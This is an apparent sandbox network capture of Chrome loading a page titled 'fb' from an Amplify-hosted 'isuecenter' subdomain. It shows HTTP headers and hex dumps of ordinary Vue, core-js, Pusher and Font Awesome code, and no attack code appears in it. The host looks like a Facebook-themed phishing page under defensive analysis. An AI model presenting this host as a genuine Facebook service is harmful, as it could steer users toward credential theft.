                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:16 UTC522INHTTP/1.1 200 OK
                                          Content-Type: text/html
                                          Content-Length: 590
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:16 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "c696ca191ca68bdedf863d677141b501"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 c6b0d1d85b2590c57ac754bf9e61944e.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: YrNBPLBxjMARIdQv-QIx9HEY0RXyHfIG2XovlZpVhEvBl-hYz7w8Yw==
                                          2024-03-25 19:07:16 UTC590INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 66 62 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72
                                          Data Ascii: <!doctype html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>fb</title><script defer="defer" sr


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.64970413.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:16 UTC591OUTGET /js/chunk-vendors.401e5810.js HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:17 UTC561INHTTP/1.1 200 OK
                                          Content-Type: application/javascript
                                          Content-Length: 244046
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:16 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "fa7113cd4ab13fd9f1d38264a5ae965d"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          Vary: Accept-Encoding
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 417c242b19212928b079740e6dd8f54c.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: XsP2lU8xcnSNL7iWyAVhQWZiyaP7pJ9STbF6VLYqweeBYFp8_id8lw==
                                          2024-03-25 19:07:17 UTC3576INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 66 62 22 5d 3d 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 66 62 22 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 39 38 5d 2c 7b 39 36 36 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 31 34 29 2c 6f 3d 6e 28 36 33 33 30 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 72 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 7d 2c 36 30 37 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 31 34 29 2c 6f 3d 53 74 72 69 6e 67 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65
                                          Data Ascii: (self["webpackChunkfb"]=self["webpackChunkfb"]||[]).push([[998],{9662:function(t,e,n){var r=n(614),o=n(6330),i=TypeError;t.exports=function(t){if(r(t))return t;throw i(o(t)+" is not a function")}},6077:function(t,e,n){var r=n(614),o=String,i=TypeError;t.e
                                          2024-03-25 19:07:17 UTC16384INData Raw: 20 74 2e 6c 65 6e 67 74 68 3d 65 7d 7d 2c 31 38 34 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 32 34 34 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 72 28 74 29 2c 6f 3d 6e 65 77 20 65 28 6e 29 2c 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 6f 5b 69 5d 3d 74 5b 6e 2d 69 2d 31 5d 3b 72 65 74 75 72 6e 20 6f 7d 7d 2c 31 35 37 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 32 34 34 29 2c 6f 3d 6e 28 39 33 30 33 29 2c 69 3d 52 61 6e 67 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 61 3d 72 28 74 29 2c 63 3d 6f 28 6e 29 2c 75 3d 63 3c 30 3f 61 2b 63 3a 63 3b 69 66 28
                                          Data Ascii: t.length=e}},1843:function(t,e,n){var r=n(6244);t.exports=function(t,e){for(var n=r(t),o=new e(n),i=0;i<n;i++)o[i]=t[n-i-1];return o}},1572:function(t,e,n){var r=n(6244),o=n(9303),i=RangeError;t.exports=function(t,e,n,s){var a=r(t),c=o(n),u=c<0?a+c:c;if(
                                          2024-03-25 19:07:17 UTC16384INData Raw: 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 5b 5d 2c 22 6c 65 6e 67 74 68 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2e 70 75 73 68 28 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 54 79 70 65 45 72 72 6f 72 7d 7d 2c 66 3d 75 7c 7c 21 6c 28 29 3b 72 28 7b 74 61 72 67 65 74 3a 22 41 72 72 61 79 22 2c 70 72 6f 74 6f 3a 21 30 2c 61 72 69 74 79 3a 31 2c 66 6f 72 63 65 64 3a 66 7d 2c 7b 70 75 73 68 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6f 28 74 68 69 73 29 2c 6e 3d 69 28 65 29 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 61 28 6e 2b 72 29 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 72 3b 63 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 2c 6e 2b 2b 3b 72
                                          Data Ascii: t.defineProperty([],"length",{writable:!1}).push()}catch(t){return t instanceof TypeError}},f=u||!l();r({target:"Array",proto:!0,arity:1,forced:f},{push:function(t){var e=o(this),n=i(e),r=arguments.length;a(n+r);for(var c=0;c<r;c++)e[n]=arguments[c],n++;r
                                          2024-03-25 19:07:17 UTC1514INData Raw: 7b 24 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 2c 65 3d 6a 2c 6e 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 74 3b 69 66 28 74 2e 5f 6e 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 72 3d 28 2e 2e 2e 6e 29 3d 3e 7b 72 2e 5f 64 26 26 48 65 28 2d 31 29 3b 63 6f 6e 73 74 20 6f 3d 4c 28 65 29 3b 6c 65 74 20 69 3b 74 72 79 7b 69 3d 74 28 2e 2e 2e 6e 29 7d 66 69 6e 61 6c 6c 79 7b 4c 28 6f 29 2c 72 2e 5f 64 26 26 48 65 28 31 29 7d 72 65 74 75 72 6e 20 69 7d 3b 72 65 74 75 72 6e 20 72 2e 5f 6e 3d 21 30 2c 72 2e 5f 63 3d 21 30 2c 72 2e 5f 64 3d 21 30 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 29 7b 63 6f 6e 73 74 7b 74 79 70 65 3a 65 2c 76 6e 6f 64 65 3a 6e 2c 70 72 6f 78 79 3a 72 2c 77 69 74 68 50 72 6f 78 79 3a 69 2c 70 72 6f 70 73 3a 73 2c 70
                                          Data Ascii: {$=null}function N(t,e=j,n){if(!e)return t;if(t._n)return t;const r=(...n)=>{r._d&&He(-1);const o=L(e);let i;try{i=t(...n)}finally{L(o),r._d&&He(1)}return i};return r._n=!0,r._c=!0,r._d=!0,r}function M(t){const{type:e,vnode:n,proxy:r,withProxy:i,props:s,p
                                          2024-03-25 19:07:17 UTC16384INData Raw: 69 3d 72 5b 6f 5d 3b 69 66 28 65 5b 69 5d 21 3d 3d 74 5b 69 5d 26 26 21 41 28 6e 2c 69 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 7b 76 6e 6f 64 65 3a 74 2c 70 61 72 65 6e 74 3a 65 7d 2c 6e 29 7b 77 68 69 6c 65 28 65 26 26 65 2e 73 75 62 54 72 65 65 3d 3d 3d 74 29 28 74 3d 65 2e 76 6e 6f 64 65 29 2e 65 6c 3d 6e 2c 65 3d 65 2e 70 61 72 65 6e 74 7d 63 6f 6e 73 74 20 71 3d 74 3d 3e 74 2e 5f 5f 69 73 53 75 73 70 65 6e 73 65 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 74 2c 65 29 7b 65 26 26 65 2e 70 65 6e 64 69 6e 67 42 72 61 6e 63 68 3f 28 30 2c 6f 2e 6b 4a 29 28 74 29 3f 65 2e 65 66 66 65 63 74 73 2e 70 75 73 68 28 2e 2e 2e 74 29 3a 65 2e 65 66 66 65 63 74 73 2e 70 75 73 68 28 74 29 3a 53 28 74 29 7d 66 75 6e 63 74
                                          Data Ascii: i=r[o];if(e[i]!==t[i]&&!A(n,i))return!0}return!1}function z({vnode:t,parent:e},n){while(e&&e.subTree===t)(t=e.vnode).el=n,e=e.parent}const q=t=>t.__isSuspense;function J(t,e){e&&e.pendingBranch?(0,o.kJ)(t)?e.effects.push(...t):e.effects.push(t):S(t)}funct
                                          2024-03-25 19:07:17 UTC16384INData Raw: 64 6c 65 72 3a 76 6f 69 64 20 30 2c 77 61 72 6e 48 61 6e 64 6c 65 72 3a 76 6f 69 64 20 30 2c 63 6f 6d 70 69 6c 65 72 4f 70 74 69 6f 6e 73 3a 7b 7d 7d 2c 6d 69 78 69 6e 73 3a 5b 5d 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 7d 2c 64 69 72 65 63 74 69 76 65 73 3a 7b 7d 2c 70 72 6f 76 69 64 65 73 3a 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 6f 70 74 69 6f 6e 73 43 61 63 68 65 3a 6e 65 77 20 57 65 61 6b 4d 61 70 2c 70 72 6f 70 73 43 61 63 68 65 3a 6e 65 77 20 57 65 61 6b 4d 61 70 2c 65 6d 69 74 73 43 61 63 68 65 3a 6e 65 77 20 57 65 61 6b 4d 61 70 7d 7d 6c 65 74 20 5f 65 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 43 65 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 3d 6e 75 6c 6c 29 7b 28 30 2c 6f 2e 6d 66 29 28 6e 29 7c 7c
                                          Data Ascii: dler:void 0,warnHandler:void 0,compilerOptions:{}},mixins:[],components:{},directives:{},provides:Object.create(null),optionsCache:new WeakMap,propsCache:new WeakMap,emitsCache:new WeakMap}}let _e=0;function Ce(t,e){return function(n,r=null){(0,o.mf)(n)||
                                          2024-03-25 19:07:17 UTC16384INData Raw: 74 75 70 3a 73 7d 3d 6e 3b 69 66 28 73 29 7b 63 6f 6e 73 74 20 6e 3d 74 2e 73 65 74 75 70 43 6f 6e 74 65 78 74 3d 73 2e 6c 65 6e 67 74 68 3e 31 3f 45 6e 28 74 29 3a 6e 75 6c 6c 3b 67 6e 28 74 29 2c 28 30 2c 72 2e 4a 64 29 28 29 3b 63 6f 6e 73 74 20 63 3d 69 28 73 2c 74 2c 30 2c 5b 74 2e 70 72 6f 70 73 2c 6e 5d 29 3b 69 66 28 28 30 2c 72 2e 6c 6b 29 28 29 2c 76 6e 28 29 2c 28 30 2c 6f 2e 74 49 29 28 63 29 29 7b 69 66 28 63 2e 74 68 65 6e 28 76 6e 2c 76 6e 29 2c 65 29 72 65 74 75 72 6e 20 63 2e 74 68 65 6e 28 28 6e 3d 3e 7b 53 6e 28 74 2c 6e 2c 65 29 7d 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 7b 61 28 65 2c 74 2c 30 29 7d 29 29 3b 74 2e 61 73 79 6e 63 44 65 70 3d 63 7d 65 6c 73 65 20 53 6e 28 74 2c 63 2c 65 29 7d 65 6c 73 65 20 4f 6e 28 74 2c 65 29 7d 66 75
                                          Data Ascii: tup:s}=n;if(s){const n=t.setupContext=s.length>1?En(t):null;gn(t),(0,r.Jd)();const c=i(s,t,0,[t.props,n]);if((0,r.lk)(),vn(),(0,o.tI)(c)){if(c.then(vn,vn),e)return c.then((n=>{Sn(t,n,e)})).catch((e=>{a(e,t,0)}));t.asyncDep=c}else Sn(t,c,e)}else On(t,e)}fu
                                          2024-03-25 19:07:17 UTC16384INData Raw: 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 6e 2e 67 3f 6e 2e 67 3a 7b 7d 29 7d 2c 34 34 31 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 28 33 37 36 37 29 2c 6e 28 38 35 38 35 29 2c 6e 28 38 36 39 36 29 2c 6e 28 37 36 35 38 29 2c 6e 28 32 38 30 31 29 2c 0a 2f 2a 21 0a 20 2a 20 50 75 73 68 65 72 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 38 2e 30 2e 32 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 70 75 73 68 65 72 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72
                                          Data Ascii: balThis?globalThis:"undefined"!==typeof self?self:"undefined"!==typeof window?window:"undefined"!==typeof n.g?n.g:{})},4410:function(t,e,n){n(3767),n(8585),n(8696),n(7658),n(2801),/*! * Pusher JavaScript Library v8.0.2 * https://pusher.com/ * * Copyr
                                          2024-03-25 19:07:17 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 76 61 72 20 72 3d 57 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 69 66 28 62 72 2e 6c 6f 67 29 62 72 2e 6c 6f 67 28 72 29 3b 65 6c 73 65 20 69 66 28 62 72 2e 6c 6f 67 54 6f 43 6f 6e 73 6f 6c 65 29 7b 76 61 72 20 6f 3d 74 2e 62 69 6e 64 28 74 68 69 73 29 3b 6f 28 72 29 7d 7d 2c 74 7d 28 29 2c 66 74 3d 6e 65 77 20 6c 74 2c 70 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 6f 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 2e 68 65 61 64 65 72 73 26 26 6e 75 6c 6c 3d 3d 6e 2e 68 65 61 64 65 72 73 50 72 6f 76 69 64 65 72 7c 7c
                                          Data Ascii: unction(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];var r=W.apply(this,arguments);if(br.log)br.log(r);else if(br.logToConsole){var o=t.bind(this);o(r)}},t}(),ft=new lt,pt=function(t,e,n,r,o){void 0===n.headers&&null==n.headersProvider||
                                          2024-03-25 19:07:17 UTC16384INData Raw: 62 73 63 72 69 70 74 69 6f 6e 50 65 6e 64 69 6e 67 3d 21 31 2c 66 74 2e 65 72 72 6f 72 28 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 2e 65 6d 69 74 28 22 70 75 73 68 65 72 3a 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 65 72 72 6f 72 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 7b 74 79 70 65 3a 22 41 75 74 68 45 72 72 6f 72 22 2c 65 72 72 6f 72 3a 65 2e 6d 65 73 73 61 67 65 7d 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 3f 7b 73 74 61 74 75 73 3a 65 2e 73 74 61 74 75 73 7d 3a 7b 7d 29 29 29 3a 74 2e 70 75 73 68 65 72 2e 73 65 6e 64 5f 65 76 65 6e 74 28 22 70 75 73 68 65 72 3a 73 75 62 73 63 72 69 62 65 22 2c 7b 61 75 74 68 3a 6e 2e 61 75 74 68 2c 63 68 61 6e 6e 65 6c 5f 64 61 74 61 3a 6e 2e 63 68 61 6e 6e 65 6c 5f 64 61 74 61 2c 63 68 61 6e 6e
                                          Data Ascii: bscriptionPending=!1,ft.error(e.toString()),t.emit("pusher:subscription_error",Object.assign({},{type:"AuthError",error:e.message},e instanceof O?{status:e.status}:{}))):t.pusher.send_event("pusher:subscribe",{auth:n.auth,channel_data:n.channel_data,chann


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.64970613.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:16 UTC597OUTGET /css/app.1aceff02.css HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:17 UTC547INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 517650
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:17 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "29ddcb6f79b8cc5bfe4dc44283336026"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          Vary: Accept-Encoding
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 b5e757a7da6f6fe6261f56a8a9646880.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: jsA6Cc89OpGf5-eRAt2N8hFbvjatakLeJqbDlmMRGzxJ8wvm222zlQ==
                                          2024-03-25 19:07:17 UTC8949INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 63 64 6e 66 6f 6e 74 73 2e 63 6f 6d 2f 63 73 73 2f 6d 6f 6e 74 73 65 72 72 61 74 3f 73 74 79 6c 65 73 3d 31 37 34 30 32 29 3b 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 31 30 30 3b 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 29 3b 68 74 6d 6c 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 73
                                          Data Ascii: @import url(https://fonts.cdnfonts.com/css/montserrat?styles=17402);@import url(https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0&display=swap);html{-webkit-text-size-adjust:100%;font-feature-settings:normal;font-family:ui-sans-serif,s
                                          2024-03-25 19:07:17 UTC12539INData Raw: 67 29 7d 34 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 32 34 25 2c 38 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 32 32 64 65 67 29 7d 32 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 32 64 65 67 29 7d 33 32 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 7d 33 36 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70
                                          Data Ascii: g)}4%{transform:rotate(15deg)}24%,8%{transform:rotate(-18deg)}12%,28%{transform:rotate(18deg)}16%{transform:rotate(-22deg)}20%{transform:rotate(22deg)}32%{transform:rotate(-12deg)}36%{transform:rotate(12deg)}40%,to{transform:rotate(0deg)}}@keyframes fa-sp
                                          2024-03-25 19:07:17 UTC16384INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 38 62 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 69 72 63 6c 65 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 61 22 7d 2e 66 61 2d 75 6e 6c 6f 63 6b 2d 61 6c 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 75 6e 6c 6f 63 6b 2d 6b 65 79 68 6f 6c 65 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 65 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 73 68 6f 77 65 72 73 2d 68 65 61 76 79 5b 64 61 74
                                          Data Ascii: e{content:"\f08b"}.fa-chevron-circle-down[data-v-e7e7d034]:before,.fa-circle-chevron-down[data-v-e7e7d034]:before{content:"\f13a"}.fa-unlock-alt[data-v-e7e7d034]:before,.fa-unlock-keyhole[data-v-e7e7d034]:before{content:"\f13e"}.fa-cloud-showers-heavy[dat
                                          2024-03-25 19:07:17 UTC16384INData Raw: 74 65 6e 74 3a 22 5c 65 31 64 35 22 7d 2e 66 61 2d 6e 6f 74 2d 65 71 75 61 6c 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 33 65 22 7d 2e 66 61 2d 62 6f 72 64 65 72 2d 73 74 79 6c 65 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 35 33 22 7d 2e 66 61 2d 6d 61 70 2d 6c 6f 63 61 74 69 6f 6e 2d 64 6f 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6d 61 70 2d 6d 61 72 6b 65 64 2d 61 6c 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65
                                          Data Ascii: tent:"\e1d5"}.fa-not-equal[data-v-e7e7d034]:before{content:"\f53e"}.fa-border-style[data-v-e7e7d034]:before,.fa-border-top-left[data-v-e7e7d034]:before{content:"\f853"}.fa-map-location-dot[data-v-e7e7d034]:before,.fa-map-marked-alt[data-v-e7e7d034]:before
                                          2024-03-25 19:07:17 UTC9483INData Raw: 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 31 22 7d 2e 66 61 2d 6d 61 73 6b 2d 76 65 6e 74 69 6c 61 74 6f 72 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 32 34 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 72 69 67 68 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 36 31 22 7d 2e 66 61 2d 6d 61 70 2d 73 69 67 6e 73 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 69 67 6e 73 2d 70 6f 73 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 37 22 7d 2e 66 61 2d 63 61 73 68 2d 72 65 67 69 73 74 65 72 5b 64 61 74 61 2d 76 2d 65 37 65 37 64
